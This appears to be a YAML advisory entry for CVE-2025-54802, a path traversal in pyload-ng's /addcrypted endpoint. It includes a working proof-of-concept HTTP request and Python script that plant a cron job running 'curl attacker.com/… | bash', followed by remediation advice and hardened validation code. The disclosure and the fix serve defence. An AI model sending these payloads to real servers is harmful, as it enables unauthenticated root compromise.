CVE-2025-54802.yaml
info:
  name: pyload-ng
  cve: CVE-2025-54802
  summary: Path Traversal in pyLoad-ng CNL Blueprint via `package` parameter allows Arbitrary File Write leading to Remote Code Execution (RCE).
  details: |
    The `addcrypted` endpoint in `pyload-ng` suffers from an unsafe path construction vulnerability, allowing unauthenticated attackers to write arbitrary files outside the designated storage directory. This can be abused to overwrite critical system files, including cron jobs and systemd services, leading to privilege escalation and remote code execution as root.
    **Endpoint**: `POST /addcrypted`
    **Issue**: `src/pyload/webui/app/blueprints/cnl_blueprint.py`
    #### Vulnerable Code
    ```python
    import os
    import flask

    # Excerpt from the addcrypted() handler; `dl_path` (download directory) and
    # `package` (request parameter) come from the handler's scope. The
    # user-supplied name is joined onto the download directory after only
    # stripping "/", "\" and ":" characters; nothing verifies that the resulting
    # path still lies inside `dl_path`.
    dlc_path = os.path.join(
        dl_path, package.replace("/", "").replace("\\", "").replace(":", "") + ".dlc"
    )
    dlc = flask.request.form["crypted"].replace(" ", "+")
    with open(dlc_path, mode="wb") as fp:
        fp.write(dlc.encode())  # assumed completion: the original excerpt ends at open()
    ```
    #### PoC
    ```http
    POST /addcrypted HTTP/1.1
    Host: localhost:8000
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 107
    package=../../../../etc/cron.d/payload&crypted=KioqICogKiAqKiByb290IGN1cmwgLXMgaHR0cDovL2F0dGFja2VyLmNvbS9yLnNoIHwgYmFzaA==
    ```
    Decoded payload:
    ```bash
    * * * * * root curl -s http://attacker.com/r.sh | bash
    ```
    **Send crafted POST**
    ```python
    import requests, base64
    payload = "* * * * * root curl http://attacker.com/rev.sh | bash"
    b64 = base64.b64encode(payload.encode()).decode()
    requests.post("http://localhost:8000/addcrypted", data={
        "package": "../../../../etc/cron.d/exploit",
        "crypted": b64
    })
    ```
    The vulnerability allows unauthenticated attackers to write arbitrary files outside the intended directory via a path traversal flaw in the `package` parameter of the `addcrypted` endpoint in `pyload-ng`. When exploited, it enables remote code execution as **root** by injecting malicious cron jobs or system files, turning a simple file upload endpoint into a full system compromise vector.
  cvss: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  severity: CRITICAL
  security_advise: |
    1. Upgrade to version `0.5.0b3.dev90` or later.
    2. Apply the patch from commit `70a44fe02c03bce92337b5d370d2a45caa4de3d4` if an upgrade is not immediately possible.
    3. Implement strict input validation and sanitization for the `package` parameter to prevent directory traversal characters.
    4. Ensure that file write operations are restricted to designated, non-sensitive directories.
rule: version < "0.5.0b3.dev90"
references:
  - https://github.com/pyload/pyload/security/advisories/GHSA-48rp-jc79-2264
  - https://nvd.nist.gov/vuln/detail/CVE-2025-54802
  - https://github.com/pyload/pyload/pull/4596
  - https://github.com/pyload/pyload/commit/70a44fe02c03bce92337b5d370d2a45caa4de3d4
  - https://github.com/pyload/pyload
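A hardened replacement for the path construction in the vulnerable code, illustrating advice items 3 and 4. This is an added example, not pyLoad's own fix from the referenced commit: it allow-lists the `package` name instead of stripping characters, and independently verifies that the fully resolved `.dlc` path stays inside the download directory. The function names and the download directory are assumptions.

```python
import os
import re

# Allow-list for the user-supplied package name (assumed policy, not pyLoad's).
_SAFE_NAME = re.compile(r"[A-Za-z0-9._-]+")


class UnsafePackageName(ValueError):
    """The package name would place the .dlc file outside the storage directory."""


def safe_dlc_path(dl_path: str, package: str) -> str:
    """Return the absolute .dlc path for `package`, guaranteed to sit under dl_path.

    Two independent checks are applied so that a weakness in one does not
    silently reintroduce traversal:
      1. an allow-list on the raw name, which rejects separators, drive letters,
         '.', '..' and empty names outright rather than stripping characters;
      2. a containment check on the fully resolved path (symlinks included).
    """
    if not package or package in (".", "..") or not _SAFE_NAME.fullmatch(package):
        raise UnsafePackageName(f"rejected package name {package!r}")
    base = os.path.realpath(dl_path)
    candidate = os.path.realpath(os.path.join(base, package + ".dlc"))
    # realpath() collapses '..' components and follows symlinks, so anything
    # that slipped past the allow-list is still caught by the containment test.
    if os.path.commonpath([base, candidate]) != base:
        raise UnsafePackageName(f"{candidate!r} escapes {base!r}")
    return candidate


def is_safe_package(dl_path: str, package: str) -> bool:
    """Boolean wrapper, convenient for logging a rejection or returning HTTP 400."""
    try:
        safe_dlc_path(dl_path, package)
        return True
    except UnsafePackageName:
        return False


if __name__ == "__main__":
    # Constructed download directory; it does not need to exist for the checks.
    dl_dir = "/srv/pyload/downloads"
    for name in ("my-package", "../../../../etc/cron.d/payload", "..", ""):
        verdict = "accepted" if is_safe_package(dl_dir, name) else "rejected"
        print(f"{name!r:40} -> {verdict}")
```

Rejected names should be logged with the source address, since a traversal attempt against this endpoint is a reliable detection signal for the exploitation described above.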